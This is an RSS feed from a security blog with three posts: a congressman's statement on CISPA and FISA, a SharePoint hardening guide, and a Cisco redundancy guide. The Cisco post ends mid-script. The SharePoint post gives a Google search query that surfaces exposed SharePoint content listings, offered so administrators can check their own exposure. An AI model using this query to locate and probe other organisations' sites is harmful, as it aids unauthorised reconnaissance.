<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Mafia Security</title>
	<atom:link href="http://www.mafiasecurity.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.mafiasecurity.com</link>
	<description>Information Security Articles &#38; Resources</description>
	<lastBuildDate>Wed, 01 May 2013 23:49:54 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
		<item>
		<title>Justin Amash CISPA and FISA</title>
		<link>https://www.mafiasecurity.com/world-events/justin-amash-cispa-and-fisa/</link>
		<comments>https://www.mafiasecurity.com/world-events/justin-amash-cispa-and-fisa/#comments</comments>
		<pubDate>Wed, 01 May 2013 23:24:50 +0000</pubDate>
		<dc:creator>Anthony Giallombardo</dc:creator>
				<category><![CDATA[World Events]]></category>
		<category><![CDATA[Network Neutrality]]></category>
		<category><![CDATA[Privacy Issues]]></category>
		<category><![CDATA[United States Government]]></category>

		<guid isPermaLink="false">https://www.mafiasecurity.com/?p=1604</guid>
		<description><![CDATA[<p>Justin Amash CISPA &#8220;On Thursday, April 18, I voted no on H.R. 624, the Cyber Intelligence Sharing and Protection Act (CISPA). This year’s version includes marginal improvements over last year’s bill, which I also opposed, but these changes don&#8217;t go far enough to protect people’s private data, and many of the bill’s most significant problems remain unaddressed. Like last ...</p><p>The post <a href="https://www.mafiasecurity.com/world-events/justin-amash-cispa-and-fisa/">Justin Amash CISPA and FISA</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></description>
				<content:encoded><![CDATA[<h4>Justin Amash CISPA</h4>
<p>&#8220;On Thursday, April 18, I voted no on H.R. 624, the Cyber Intelligence Sharing and Protection Act (CISPA). This year’s version includes marginal improvements over last year’s bill, which I also opposed, but these changes don&#8217;t go far enough to protect people’s private data, and many of the bill’s most significant problems remain unaddressed. Like last year, the bill overrides federal and state privacy laws and contracts. It exempts private entities from all federal and state liability when they share “cyber threat information” with the federal government—a term broadly defined to mean any information “directly pertaining to [a] threat to [] a system or network,” which could include your personally identifiable information, such as e-mails.</p>
<p>Under CISPA, companies are actually prohibited from making legally binding commitments to protect users’ personal data and e-mail. Without facing liability, companies have no means of assuring customers or employees that they will follow through on their privacy agreements, which means companies cannot easily compete in the area of user privacy. House leadership killed my bipartisan amendment to fix this problem, denying it a full vote on the House floor. My simple, quarter-page amendment merely asserted that CISPA’s liability exemption did not give companies authority “to breach a contract with another party.” It certainly would have passed unanimously or almost unanimously. By rejecting this amendment, the Committee on Rules voted to void private contracts and undermine the Rule of Law.</p>
<p>The bill also inappropriately allows the government to use the information it receives from private entities for purposes other than cybersecurity, such as protecting individuals generally “from the danger of death or serious bodily harm,” investigating and prosecuting certain crimes, and protecting minors. And the government may search through the information it receives to find specific information pertaining to these items, trampling on our Fourth Amendment right to be secure against unreasonable searches and seizures. Rep. Jared Polis offered an amendment, which I cosponsored, that would have ensured the government could use information shared with it under CISPA only to prevent imminent cyber attacks, but again, the Committee on Rules rejected this important change.</p>
<p>Cybersecurity is a real concern for the federal government and many public and private entities. But CISPA goes far beyond what is necessary to ensure the government and the private sector have the information and tools needed to protect against cyber threats. Just a few simple changes (many of which were offered as amendments but rejected by the Committee on Rules) would have made CISPA more protective of your privacy and civil liberties while still reducing legal barriers to timely sharing of actual cyber threat intelligence. House leadership rejected these changes without even permitting a vote on the amendments.</p>
<p>H.R. 624 passed 288-127.&#8221;</p>
<h4>Justin Amash FISA</h4>
<p>&#8220;On Tuesday, April 16, I voted yes on the motion to suspend the rules and pass H.R. 1163, the Federal Information Security Amendments Act of 2013. The bill deals with cybersecurity for federal information systems. (This bill is not CISPA, which I opposed.) Among other things, the bill directs federal agencies to implement information security programs that include automated and continuous system monitoring, and to conduct routine threat assessments. According to the Committee on Oversight and Government Reform, many federal agencies are not adequately protected against real-time threats and have failed to incorporate modern technological developments into their information system security. The bill helps address these problems. H.R. 1163 passed 416-0.&#8221;</p>
<p>- Office of Justin Amash @mail.house.gov</p>
<p>The post <a href="https://www.mafiasecurity.com/world-events/justin-amash-cispa-and-fisa/">Justin Amash CISPA and FISA</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></content:encoded>
			<wfw:commentRss>https://www.mafiasecurity.com/world-events/justin-amash-cispa-and-fisa/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SharePoint Security Concepts &amp; Application</title>
		<link>https://www.mafiasecurity.com/software-assurance/sharepoint-security-concepts-application/</link>
		<comments>https://www.mafiasecurity.com/software-assurance/sharepoint-security-concepts-application/#comments</comments>
		<pubDate>Sat, 27 Apr 2013 19:21:36 +0000</pubDate>
		<dc:creator>Ismail Saifudin</dc:creator>
				<category><![CDATA[Operational Security]]></category>
		<category><![CDATA[Software Assurance]]></category>
		<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Compliance]]></category>
		<category><![CDATA[Privacy Issues]]></category>
		<category><![CDATA[Risk Management]]></category>
		<category><![CDATA[Social Media]]></category>
		<category><![CDATA[Windows Server]]></category>

		<guid isPermaLink="false">https://www.mafiasecurity.com/?p=1599</guid>
		<description><![CDATA[<p>SharePoint is the common name for a group of five Microsoft SharePoint products and technologies.  SharePoint began as a data and document management solution, with new iterations acquiring aspects of a web server, wiki, blog creation/management and social networking -  the last feature coming from features offered by Yammer, a corporate social networking service bought ...</p><p>The post <a href="https://www.mafiasecurity.com/software-assurance/sharepoint-security-concepts-application/">SharePoint Security Concepts &#038; Application</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>SharePoint is the common name for a group of five Microsoft SharePoint products and technologies. SharePoint began as a data and document management solution; later iterations acquired aspects of a web server, wiki, blog creation/management and social networking, the last feature drawing on Yammer, a corporate social networking service Microsoft bought in 2012. When used with Office 2013/365, SharePoint can act as an internal Dropbox and network share rolled into one, letting users synchronize files and folders to a personal space, a shared document library, or both. Let's take a look at SharePoint security.</p>
<p><b>Main issues regarding security of SharePoint deployments:</b></p>
<p>Organizations tend to adopt SharePoint faster than they adopt security measures for it. As always, convenient tools spread faster than the controls that, by nature, restrict what users can do. Striking a balance between accessibility and restrictiveness is the goal of any well thought out and implemented security policy. SharePoint lets users easily create sites in order to share data, so decentralization is the name of the game, and decentralized environments are often outside the sphere of influence of IT and security administrators. Instead of securing particular folders via access control, the security team now has to secure existing and future SharePoint sites and, before that, locate them.</p>
<p>Another issue is permissions administration, which is more complex than its NTFS counterpart. Access control decisions are left to the data's owners, and those decisions may conflict with enterprise-level access policies. SharePoint's permission model lets specific users perform specific actions or see specific things based on their role, and a workflow author can automate administration by routing a user into a new task based on the status of a completed or existing task.</p>
<p>Resource auditing, seeing which user took what action on what data, is a challenge in SharePoint. The built-in auditing capabilities are limited in scalability across sites and platforms: data can be copied to file shares, e-mail and so on without an audit trail that crosses sites. An administrator may be able to audit data on one site, but once that data moves to another site or platform, auditing software has difficulty continuously tracking and corroborating it.</p>
<p><b>How an attacker can glean information from publicly available SharePoint resources:</b></p>
<p>Google hacking:</p>
<p>Type inurl:&#8221;/_layouts/viewlsts.aspx&#8221; into Google and view the results. This basic technique lists indexed sites whose View All Site Content page is exposed externally. Other search operators can expose user information, roles, personal information, account SIDs, e-mail addresses, site administrators and so on. Google only shows what it has already indexed, so to check your own farm request that page without credentials and confirm that you are challenged for credentials (or redirected to a login page) rather than served the listing.</p>
<p>inurl: is a Google search operator that restricts results to pages whose URL contains the given term.</p>
<h4>SharePoint security measures (from the top down):</h4>
<p><strong>1.      Securing the Farm</strong></p>
<p>A SharePoint farm is the collection of SharePoint servers and the SQL Server instances that back them, working together to provide SharePoint services for a set of sites. Services running in the farm are allocated across its servers to balance architecture and performance. Farm-level permissions are simple: there are farm administrators and everyone else. A farm administrator has full control over the farm, including web applications, managing services and backups, all of which are done through Central Administration, the web-based administration interface. The farm administrator role is granted in Central Administration by adding AD users or groups to the Farm Administrators group. Certain actions also require the farm administrator to be a local administrator on the server(s) running the Central Administration web application, so keep both memberships small and review them regularly.</p>
<p><b>2.      </b><b>Granting PowerShell Access</b></p>
<p>PowerShell provides command-line access to administer and automate SharePoint functions that can also be performed from the Central Administration web application. Users are granted the ability to run SharePoint cmdlets with the Add-SPShellAdmin cmdlet, which adds them to the SharePoint_Shell_Access role on the farm configuration database and to the WSS_Admin_WPG local group on the farm's servers. With the -database parameter, the same role is also granted on the specified content database. Shell access is therefore close to farm-administrator power: list its members with Get-SPShellAdmin and revoke them with Remove-SPShellAdmin when they are no longer needed.</p>
<p><b>3.      </b><b>Securing Web Applications (via basic or digest authentication) &amp; Zones</b></p>
<p>Web applications are the user's entry point into SharePoint, which also makes them the entry point for attackers. A web application consists of one or more IIS websites and controls how users are authenticated. Do not allow anonymous access unless a zone explicitly needs it, and prefer Windows authentication (Kerberos or NTLM) over basic or digest authentication; basic authentication sends credentials in a trivially reversible encoding and is only acceptable over TLS. Using multiple web applications as a segmentation measure is also prudent, since it isolates content or sets of users, such as an extranet.</p>
<p>Using zones is also valuable. When a web application is created, the default zone is created. The web application can then be extended to create other zones up to a maximum of 5 zones: Default, Intranet, Internet, custom, extranet.</p>
<p>Each zone is effectively a separate IIS website (the extension), with its own application pool. Users reach the content through different URLs with varying levels of security depending on which URL they use, so zones can enforce access and policy conditions for groups of users.</p>
<p>This allows you to set Windows authentication for the intranet zone, forms-based authentication for the extranet and forms-based authentication with anonymous access for the Internet zone.</p>
<p>Adjusting permissions to content within a web application requires changing the user policy for the web application, through Central Administration &gt; Manage web applications &gt; select the web application &gt; User Policy. Permissions can then be granted or denied. A deny in the web application user policy takes precedence over all other permissions and is the only way to explicitly deny a user access to SharePoint. For granting permissions, it is generally better to do so at the individual site collection level.</p>
<p><b>4.      </b><b>Anonymous Access:</b></p>
<p>To adjust which permissions an anonymous user receives, after anonymous access has first been enabled for the zone in the web application's authentication provider settings, perform the following:</p>
<ul>
<li>Per object, go to the Site Actions menu and use the object's context menu (the edit control block).</li>
<li>If necessary, click Stop Inheriting Permissions.</li>
<li>Select Anonymous Access.</li>
<li>Select the permissions to grant anonymous users, keeping them to the minimum needed and reviewing them periodically, since anonymously readable objects are exactly what the Google search above finds.</li>
</ul>
<p><b>5.      </b><b>Securing site collections:</b></p>
<p>A site collection is also referred to as a top-level site or root site. It contains configuration settings that apply to all the sites within it, such as quotas, search settings, recycle bin settings, etc. As mentioned previously, permissions can be assigned at the web application level and at the individual site level. Typically users are authenticated at the web application level and authorization (what users can access) is performed at the individual site collection level. It is therefore advisable to assign permissions via the individual site collections for day-to-day management.</p>
<p>When permissions are set on a site collection, they are inherited by all websites, lists, libraries, folders and items in it; inheritance can be broken where needed, at the cost of one more scope to audit. If a user attempts to access a site to which they have not been granted access, the access denied page can be configured to let them request access.</p>
<p>Within a site collection, the highest level of access belongs to the site collection administrator. The farm administrator assigns a primary and, optionally, a secondary site collection administrator in Central Administration; those administrators can then add as many additional site collection administrators as needed from Site Settings. Each site collection is administered separately, so delegating administrative tasks to trained users is convenient, but every site collection administrator has full control over everything in the collection, so keep the list short.</p>
<p><b>6.      </b><b>Enabling Groups:</b></p>
<p>Groups in SharePoint are similar to those in other systems, but they are specific to, and limited to, their site collection. Do not confuse them with AD groups: one AD group can be granted permissions in multiple site collections. Each site collection has built-in permission levels that can be assigned to users or groups; these resemble NTFS permissions (Full Control, Read, etc.) and include others such as Design. Custom permission levels can also be created for more granular access control.</p>
<p>Permissions within a site collection can be granted by:</p>
<ul>
<li>Adding one or more users to a SharePoint group and granting that group permissions</li>
<li>Adding one or more users to an AD security group and granting that group permissions</li>
<li>Adding one or more users to an AD security group, adding the AD group to a SharePoint group, and granting the SharePoint group relevant permissions</li>
<li>Granting permissions directly to users, without the use of groups.</li>
</ul>
<p>*Permissions are assigned by going to the Site Actions menu within the site collection and selecting Site Permissions &gt; Grant Permissions &gt; select users, SharePoint groups or AD security groups. Prefer granting to groups; permissions granted directly to individual users are the hardest to find and clean up later.</p>
<h4><b>Enterprise wide visibility and control for compliance purposes for SharePoint Security:</b></h4>
<p>SharePoint uses its own authorization model, stored in the SQL Server content databases of the SharePoint installation. Authorization is therefore done per site collection, and a comprehensive view of access rights across all sites is difficult to get. There are a number of ways to address this. One is to extract the entitlement (permissions) report from each site collection and merge them into a single report. Third-party vendors such as Nintex, Idera and Quest Software provide tools for enterprise-wide visibility and reporting.</p>
<p>Another approach involves using a centrally managed service from a third party vendor to take advantage of the .NET role provider interface (SharePoint is a .NET framework-based application) and enable external-based authorization solutions. This can replace or be used in conjunction with SharePoint’s internal authorization scheme. *Cost is a factor with this approach as solutions can be expensive.</p>
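<p>As an added example (not part of the original article or of any vendor tool), the following Python script performs the first approach above: it merges per-site-collection entitlement exports into one cross-site view, listing Full Control holders, permissions granted directly to users, anonymous grants, objects with broken inheritance, and principals that appear in more than one site collection. The CSV column names and the sample rows are constructed for the illustration; in practice each site collection's rows would come from its permission pages or a PowerShell dump of role assignments.</p>

```python
"""Merge per-site-collection SharePoint entitlement exports into one cross-site view.
Added illustration, not code from the original article or any vendor tool; the CSV
columns and the rows below are constructed for the example."""
import csv
import io
from collections import defaultdict

# Constructed export: one row per role assignment across two site collections.
# 'inherits' = N means the object has unique permissions (inheritance was broken).
SAMPLE_EXPORT = """\
site,object,object_type,principal,principal_type,permission_level,inherits
https://intranet/sites/hr,/,Site,HR Owners,SharePointGroup,Full Control,Y
https://intranet/sites/hr,/,Site,HR Members,SharePointGroup,Contribute,Y
https://intranet/sites/hr,/Shared Documents/Payroll,Library,CORP\\jdoe,User,Full Control,N
https://intranet/sites/hr,/Shared Documents/Payroll,Library,CORP\\hr-payroll,ADGroup,Read,N
https://intranet/sites/projects,/,Site,Projects Owners,SharePointGroup,Full Control,Y
https://intranet/sites/projects,/,Site,CORP\\jdoe,User,Design,Y
https://intranet/sites/projects,/Lists/Public FAQ,List,Anonymous,Anonymous,Read,N
https://intranet/sites/projects,/Lists/Public FAQ,List,NT AUTHORITY\\Authenticated Users,ADGroup,Read,N
"""

def parse_entitlement_export(text):
    """Parse one or more concatenated CSV exports into role-assignment dicts."""
    return list(csv.DictReader(io.StringIO(text)))

def audit_entitlements(rows):
    """Build the cross-site findings a compliance reviewer asks for."""
    full_control = defaultdict(set)        # site -> principals holding Full Control
    direct_user_grants = []                # (site, object, user, level)
    anonymous_objects = []                 # (site, object, level)
    unique_scopes = defaultdict(set)       # site -> objects with broken inheritance
    sites_per_principal = defaultdict(set) # principal -> site collections it appears in
    for r in rows:
        site, obj, principal = r["site"], r["object"], r["principal"]
        if r["principal_type"] != "Anonymous":
            sites_per_principal[principal].add(site)
        if r["permission_level"] == "Full Control":
            full_control[site].add(principal)
        if r["principal_type"] == "User":
            direct_user_grants.append((site, obj, principal, r["permission_level"]))
        if r["principal_type"] == "Anonymous":
            anonymous_objects.append((site, obj, r["permission_level"]))
        if r["inherits"].upper() == "N":
            unique_scopes[site].add(obj)
    cross_site = {p: sorted(s) for p, s in sites_per_principal.items() if len(s) > 1}
    return {
        "full_control": {s: sorted(p) for s, p in full_control.items()},
        "direct_user_grants": direct_user_grants,
        "anonymous_objects": anonymous_objects,
        "unique_scopes": {s: sorted(o) for s, o in unique_scopes.items()},
        "cross_site_principals": cross_site,
    }

def report(findings):
    """Render the findings as plain text for a review meeting or a ticket."""
    lines = []
    for site, principals in findings["full_control"].items():
        lines.append(f"[FULL CONTROL] {site}: {', '.join(principals)}")
    for site, obj, user, level in findings["direct_user_grants"]:
        lines.append(f"[DIRECT GRANT] {user} has {level} on {site}{obj} (prefer a group)")
    for site, obj, level in findings["anonymous_objects"]:
        lines.append(f"[ANONYMOUS] {level} on {site}{obj}")
    for site, objs in findings["unique_scopes"].items():
        lines.append(f"[UNIQUE PERMS] {site}: {', '.join(objs)}")
    for principal, sites in findings["cross_site_principals"].items():
        lines.append(f"[CROSS-SITE] {principal} appears in {len(sites)} site collections")
    return "\n".join(lines)

if __name__ == "__main__":
    print(report(audit_entitlements(parse_entitlement_export(SAMPLE_EXPORT))))
```

<p>Run it as a script to print the findings. The direct-user grants are the ones the group-based guidance above warns against, the anonymous entries are what the Google search earlier in the article would find, and the cross-site list is the view SharePoint itself does not give you.</p>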
<p>The post <a href="https://www.mafiasecurity.com/software-assurance/sharepoint-security-concepts-application/">SharePoint Security Concepts &#038; Application</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></content:encoded>
			<wfw:commentRss>https://www.mafiasecurity.com/software-assurance/sharepoint-security-concepts-application/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco Fault Tolerant Network Design</title>
		<link>https://www.mafiasecurity.com/network/cisco-fault-tolerant-network-design/</link>
		<comments>https://www.mafiasecurity.com/network/cisco-fault-tolerant-network-design/#comments</comments>
		<pubDate>Fri, 05 Apr 2013 18:21:17 +0000</pubDate>
		<dc:creator>Casey Walters</dc:creator>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Networking]]></category>

		<guid isPermaLink="false">https://www.mafiasecurity.com/?p=1596</guid>
		<description><![CDATA[<p>Whether you’re building a brand new network or looking for ways to improve the resiliency of your existing infrastructure, the following guide is intended to give some tips on how to minimize the effects of failures within the network. This guide explains configuration for primarily Cisco Fault Tolerant Network Design equipment, but a lot of ...</p><p>The post <a href="https://www.mafiasecurity.com/network/cisco-fault-tolerant-network-design/">Cisco Fault Tolerant Network Design</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></description>
				<content:encoded><![CDATA[<p style="text-align: left;" align="center">Whether you’re building a brand new network or looking for ways to improve the resiliency of your existing infrastructure, the following guide is intended to give some tips on how to minimize the effects of failures within the network. It covers configuration primarily for Cisco equipment, but many of the same principles and protocols apply to other vendors' equipment.</p>
<p style="text-align: left;" align="center">We’ll start with the relatively simple concept of redundant power, which you might find is one of the most neglected parts of a network design. I&#8217;ve encountered many dead switches in wiring closets that probably would have lived longer if proper power protection had been installed along with the switch. Network devices are also not built to be rebooted often, so a split-second power loss that reboots every switch is not healthy for them. It amazes me how people will drop thousands of dollars on new network equipment and not bother to protect that investment with a solid Uninterruptible Power Supply (UPS). The concept is simple: when the building loses power, a UPS in each wiring closet takes over on battery to keep the equipment running. This only becomes more important as Power over Ethernet (PoE) devices gain in popularity. Take a network running voice over IP (VoIP) and some wireless access points that draw power from the PoE switches in each closet: if a power blip occurs and there are no UPSs in the wiring closets, every phone and access point reboots along with the switches once building power is restored. That adds up to a LOT of downtime if a storm keeps knocking out power for a split second every hour. If it’s in your budget, I always recommend UPSs that are IP enabled, meaning there is either a built-in Ethernet port or a separate module you can install to manage the device remotely over the network. It’s also very useful to have the device e-mail you when it needs a replacement battery or send an SNMP trap to your monitoring server, which leads to the importance of monitoring.</p>
<p style="text-align: left;" align="center">You can build all the redundancy and fault tolerance into your network that you want, but if you are not monitoring for failures and acting on those alerts, you’re only prolonging the outages that will eventually occur. There are many ways to do this, but the most popular I’ve seen are SNMP (Simple Network Management Protocol), syslog, and, believe it or not, a simple ping. PRTG, SolarWinds and Nagios are a few programs that come to mind for SNMP monitoring, and there are a few free tools for syslog monitoring as well. Here is a quick breakdown of how to set up SNMP on a Cisco switch (the commands are the same or similar on other devices).</p>
<p style="text-align: left;">SNMP versions 1 and 2c work with community names (strings). If your device is configured with the same community name as your SNMP monitoring server, you will see statistics and data populating in your monitoring application. Be aware that the community string travels in cleartext and is the only credential, so treat it as a password: don’t use public or private, bind it to an access list as described below, and use SNMPv3 with authentication and privacy where your devices and poller support it. You’ll also need to make sure UDP port 161 (polling, towards the device) and UDP port 162 (traps, towards the monitoring server) are allowed on your network before deploying this. Here is a config snippet to get you started, with some notes.</p>
<p style="text-align: left;"><em>Switch(config)#snmp-server community EXAMPLE RO</em></p>
<p style="text-align: left;">The “EXAMPLE” part of this command is the community string that must match whatever program you’ll be using to poll SNMP data. “RO” makes it a read-only community, so the string can only be used to read data, not to change the device; avoid RW communities unless you have a specific need for them. You can optionally add the number (or name) of a standard IP access list at the end of this command to bind the community to that list, so that only the addresses you permit in the access list can query the device with this string. Define the access list first and permit only your monitoring server’s host address.</p>
<p style="text-align: left;">Another feature built into every Cisco switch that is often neglected is spanning tree protocol, and I would be crazy not to include a short discussion of it in my guide, so here goes. Spanning tree protocol is a nice insurance policy to make sure your network is running loop free, so I highly recommend using it. It’s also a nice way to purposely build some redundant links into your network. There is a ton of information on spanning tree protocol and how to fine tune it, but I’ll concentrate on the basics. By default, almost all modern Cisco switches run PVST+ (Per-VLAN Spanning Tree), which is a separate 802.1D STP instance for each VLAN. With classic 802.1D STP it can take up to 50 seconds (20 seconds of max age plus 15 seconds each in the listening and learning states) for spanning tree to reconverge after a link failure. That is long enough for phones to reset, web pages to time out, and the phones on your desk to start ringing with angry users wondering what is going on. This was once an acceptable hiccup in the middle of the day, but modern networks require far more uptime than ever before, and this amount of downtime is often not acceptable. If you remember to enter the one command below on every switch in your network you can drastically speed up your spanning tree convergence time.</p>
<p style="text-align: left;"><em> Switch(config)#spanning-tree mode rapid-pvst</em></p>
<p style="text-align: left;">This command enables rapid spanning tree (802.1w, as Rapid PVST+) on your switch. Once it is turned on you’re only looking at a few seconds (about 3 in my experience) for spanning tree to converge after a link failure, provided every switch in the network runs it; a port that hears classic 802.1D BPDUs from a neighbour falls back to the slow timers on that link, which is why the command belongs on every switch. Another thing that is often left out when deploying switches is statically setting the root switch in the spanning tree topology. Let’s bring up an example to show what I’m talking about. Maybe we are a growing network, constantly adding switches to new parts of the building, and I have not decided which switch I want to be the root bridge in the spanning tree topology. By default the switch with the lowest bridge ID wins the election, and since every switch ships with the same priority (32768) that means the lowest MAC address, which is often the oldest switch in the network. This is a MAJOR problem, because if my network has hundreds of VLANs the root bridge has hundreds of spanning tree instances to keep track of. If the oldest switch in the network can’t handle this you’ll experience major instabilities on the network. This is why it’s very important to carefully plan which switch will be the root bridge and then statically set its priority. You can accomplish this with the following command:</p>
<p style="text-align: left;"><em>Switch(config)#spanning-tree vlan [VLAN # or range] priority 0</em></p>
<p style="text-align: left;">I always set mine to the lowest (best) priority to eliminate any consequences of somebody bringing in a switch with a better priority value than mine, but note that if another switch appears on the network with the same priority of 0 you’re back to a lowest-MAC-address decision for the root bridge. Priority alone therefore does not protect the topology from a rogue or mis-configured switch: enable root guard on every port where the root bridge should never appear, and BPDU guard (with PortFast) on access ports, so that a stray switch is error-disabled instead of taking over your spanning tree.</p>
<p style="text-align: left;">So now you’ve got some redundant links in your network and your monitoring software will tell you when a link has failed over so you can make the necessary adjustments to restore that link, but what if we want to minimize downtime even further by using link aggregation for sub-second failover on our redundant links? This is where the use of Etherchannels can really shine. In short, an Etherchannel is a grouping of physical links on a switch to form one virtual link. If you’ve ever worked with T1s to setup multi-link bundles, the concept is very similar to this in that we are load balancing across two separate physical links.</p>
<p style="text-align: left;">If spanning tree protocol is setup correctly on your network you’ll see something that looks like the figure below with one port in the “blocking” state where traffic is not being forwarded on this link.</p>
<p style="text-align: left;">When you run the “show spanning-tree” command you will see this link’s status as “BLK.” Let’s bundle these two links together into an EtherChannel using the following commands.</p>
<p style="text-align: left;">Both ends will have identical configuration, because we chose the same port numbers on each side. This is a nice way to add some consistency to your network and be able to easily predict how the other end is set up when troubleshooting any issues.</p>
<p style="text-align: left;">First we’ll create the virtual interface by simply typing in interface and then the string “port-channel” with a number directly after it.</p>
<p style="text-align: left;"><em>Switch(config)#interface port-channel1</em></p>
<p style="text-align: left;">*The range of numbers you can use will be dependent on what model of switch you are configuring and might vary between IOS versions.</p>
<p style="text-align: left;">Now we will be dropped into interface configuration mode where we will need to add the configuration we need for our switch to switch link just like we would if it was a physical interface. Since this is a switch to switch link I’m going to configure it as a trunk port, so it can carry traffic for multiple VLANs across it.</p>
<p style="text-align: left;"><em>Switch(config-if)#switchport mode trunk</em><br />
<em>Switch(config-if)#switchport nonegotiate</em></p>
<p style="text-align: left;">From here, this should look quite familiar. I like to use the “switchport nonegotiate” command after setting a link as a trunk to disable DTP (Dynamic Trunking Protocol). Just make sure that if you configure it this way both ends are identical, because this command means the port is set to trunk manually instead of relying on a negotiation between the switches. I’ve heard mixed things on whether this actually speeds up convergence, but I prefer to configure trunks this way anyway, because I generally don’t like relying on the network to do anything automatically and it’s nice to eliminate the overhead of DTP packets. Disabling DTP is also a security measure: a port left in a dynamic mode will negotiate a trunk with anything that speaks DTP, which is the basis of switch-spoofing VLAN hopping, so the same command belongs on access ports too. On platforms that support ISL as well as 802.1Q (the 3560/3750 families, for example) you must set “switchport trunk encapsulation dot1q” before “switchport mode trunk” will be accepted.</p>
<p style="text-align: left;">Our next step is to assign physical interfaces to our newly created port-channel interface. I’ll select both my interfaces at once using the range command shown below and configure both interfaces in one swipe.</p>
<p style="text-align: left;"><em>Switch(config)#interface range GigabitEthernet1/0/1-2</em></p>
<p style="text-align: left;">Next make sure that the configuration on your physical interfaces matches what we just applied to the port-channel interface. If it doesn’t, very unpredictable behaviour can occur over the link once it comes up as an EtherChannel. Some IOS versions copy the port-channel configuration down to all of the member interfaces, but not all do, so check this before moving on.</p>
<p style="text-align: left;"><em>Switch(config-if-range)#switchport mode trunk</em><br />
<em>Switch(config-if-range)#switchport nonegotiate</em></p>
<p style="text-align: left;">Now we’ll enter our channel-group configuration.</p>
<p style="text-align: left;"><em>Switch(config-if-range)#channel-group 1 mode on</em></p>
<p style="text-align: left;">We start with “channel-group” to tell the switch that the selected physical interfaces will be part of a virtual interface, followed by the number we used earlier for the port-channel interface, which binds these physical interfaces to it.</p>
<p style="text-align: left;">For the last part of the command I used “mode on” to tell the physical interfaces to form an Etherchannel unconditionally. You have a few options here; the short version is that PAgP (Port Aggregation Protocol, Cisco proprietary) or LACP (Link Aggregation Control Protocol, IEEE 802.3ad) can be used to negotiate the Etherchannel instead. As with trunk ports, my preference is to avoid a negotiation protocol unless it is required, and on a plain switch-to-switch link it isn’t. Most Cisco documentation I have read suggests PAgP, but as I understand it that is mainly because a negotiating protocol protects you from your own mistakes: if the two ends disagree, the channel simply does not form, whereas “mode on” bundles the links regardless, and a mismatched far end can leave one switch treating the links as one logical port while the other still sees two separate links. So the key is making sure both ends of the Etherchannel have identical configuration. I have had a lot of success with “mode on”.</p>
<p style="text-align: left;">After these steps, “no shutdown” the physical interfaces and the Etherchannel should come up. Spanning tree treats the port-channel as a single logical link, so it will not block either member, and you should see sub-second failover if one of the links goes down. Run “show etherchannel summary” from privileged EXEC mode to verify that both ports are bundled; ports that are up in the Etherchannel are flagged with a “P” in that output.</p>
<p style="text-align: left;">Now your topology should logically look like this:</p>
<p style="text-align: left;">Make a note of the load-balancing method your switches use by default for Etherchannels, as you may need to adjust it depending on where the channel sits in the network. Many newer models can balance on source/destination MAC address, source/destination IP address, or Layer 4 ports. I recommend balancing by source or destination IP address when you can, but this is not always the best choice. For example, if an Etherchannel goes to a heavily used server and you balance by destination IP address, most of the traffic will ride a single link, because every user is heading for the same destination IP, your server’s. It is also important to note that the load-balancing method is a global setting: once you choose one, it applies to every Etherchannel on the switch.</p>
<p style="text-align: left;">Here is the command to adjust the load balancing method:</p>
<p style="text-align: left;"><em>Switch(config)#port-channel load-balance ?</em><br />
<em>   dst-mac    Dst Mac Addr</em><br />
<em>   src-mac    Src Mac Addr</em></p>
<p style="text-align: left;">And you can verify what load balancing is currently running with the “show etherchannel load-balance” command.</p>
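<p style="text-align: left;">The checks above (members matching the port-channel, both ends identical, “mode on” on both sides) are easy to get wrong by hand across two switches, so here is a small checker, added as an example and not part of the original article. It parses running-config excerpts for two switches (constructed below as SW1 and SW2; the peer has two deliberate mistakes on Gi1/0/2) and lists every mismatch that “mode on” would silently accept:</p>

```python
"""Consistency check for both ends of an EtherChannel. Added example, not from
the original article: it parses 'show running-config' excerpts (constructed
below for two assumed switches, SW1 and SW2) and reports the mismatches that
'mode on' will not catch for you."""
import re

SW1_CONFIG = """\
interface Port-channel1
 switchport mode trunk
 switchport nonegotiate
!
interface GigabitEthernet1/0/1
 switchport mode trunk
 switchport nonegotiate
 channel-group 1 mode on
!
interface GigabitEthernet1/0/2
 switchport mode trunk
 switchport nonegotiate
 channel-group 1 mode on
!
"""

# Constructed peer with two deliberate mistakes on Gi1/0/2: DTP was left enabled
# (no 'switchport nonegotiate') and the port was bundled with PAgP 'desirable'.
SW2_CONFIG = """\
interface Port-channel1
 switchport mode trunk
 switchport nonegotiate
!
interface GigabitEthernet1/0/1
 switchport mode trunk
 switchport nonegotiate
 channel-group 1 mode on
!
interface GigabitEthernet1/0/2
 switchport mode trunk
 channel-group 1 mode desirable
!
"""

CHANNEL_RE = re.compile(r"^channel-group (\d+) mode (\S+)$")
# Settings that must agree between the port-channel and its members and between
# the two ends. This covers what the article configures; allowed/native VLAN
# lines start with 'switchport trunk' and are caught by the same prefix.
TRACKED = ("switchport mode", "switchport nonegotiate", "switchport trunk")

def parse_interfaces(config):
    """Return {interface name: set of indented config lines} from an IOS excerpt."""
    interfaces, current = {}, None
    for line in config.splitlines():
        if line.startswith("interface "):
            current = line.split(None, 1)[1].strip()
            interfaces[current] = set()
        elif line.startswith(" ") and current is not None:
            interfaces[current].add(line.strip())
        else:
            current = None  # '!' or a top-level command closes the stanza
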